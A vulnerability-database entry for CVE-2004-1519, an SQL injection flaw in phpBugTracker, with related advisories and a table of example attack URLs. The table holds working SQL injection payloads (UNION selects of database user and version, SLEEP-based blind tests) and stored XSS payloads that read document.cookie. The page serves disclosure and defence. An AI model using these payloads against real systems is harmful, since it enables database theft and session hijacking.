Lucene search
+L

CVE-2004-1519

🗓️ 19 Feb 2005 05:00:00Reported by mitreType 
cve
 cve
🔗 web.nvd.nist.gov👁 49 Views🌐 WEB

SQL injection in bug.php in phpBugTracker 0.9.1 allows remote attackers to execute arbitrary SQL commands

Related
Detection
Refs
Paths
ReporterTitlePublishedViews
Family
0day.today
phpBugTracker 1.6.0 - Multiple Vulnerabilities
23 Feb 201500:00
zdt
Cvelist
CVE-2004-1519
19 Feb 200505:00
cvelist
Exploit DB
phpBugTracker 1.6.0 - Multiple Vulnerabilities
23 Feb 201500:00
exploitdb
EUVD
EUVD-2004-1513
7 Oct 202500:30
euvd
exploitpack
phpBugTracker 1.6.0 - Multiple Vulnerabilities
23 Feb 201500:00
exploitpack
NVD
CVE-2004-1519
31 Dec 200405:00
nvd
Packet Storm
phpBugTracker 1.6.0 CSRF / XSS / SQL Injection
19 Feb 201500:00
packetstorm
NVD
ParameterPositionPathDescriptionCWE
idquery paramadmin/project.php?op=edit_component&id=1%27+and+1=2+union+select+1,2,database%28%29,user%28%29,5,6,version%28%29,8,9,10,11,12+--+SQL injection in project.php via id parameter (edit_component)
project_namequery paramadmin/project.php?op=addStored XSS via input field "project name" during add (project.php)
projectquery paramadmin/bug.php?op=add&project=1%27+and+1=2+union+select+user%28%29+--+SQL injection / CSRF via project parameter in bug.php add
use_jsquery paramadmin/user.php?op=edit&use_js=1%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&user_id=1Stored XSS via use_js parameter in user.php (edit)
user_idquery paramadmin/user.php?op=edit&use_js=1%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&user_id=1Stored XSS via use_js parameter in user.php (edit)
use_jsquery paramadmin/group.php?op=edit&use_js=1%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&group_id=1Stored XSS via use_js parameter in group.php (edit)
group_idquery paramadmin/group.php?op=edit&use_js=1%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&group_id=1Stored XSS via use_js parameter in group.php (edit)
group_idquery paramadmin/group.php?op=edit&use_js=1&group_id=1+and+SLEEP%2810%29+--+Blind SQL Injection / CSRF via group_id parameter (Sleep test)
use_jsquery paramadmin/group.php?op=edit&use_js=1&group_id=1+and+SLEEP%2810%29+--+Blind SQL Injection / CSRF via group_id parameter (Sleep test)
group_idquery paramadmin/group.php?op=edit&use_js=1&group_id=8+and+substring%28version%28%29,1,1%29=5+--+Blind SQL Injection via group_id parameter (version check)
Rows per page

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

16 Jun 2026 22:07Current
8.3High risk
Vulners AI Score8.3
CVSS 27.5
EPSS0.01233
49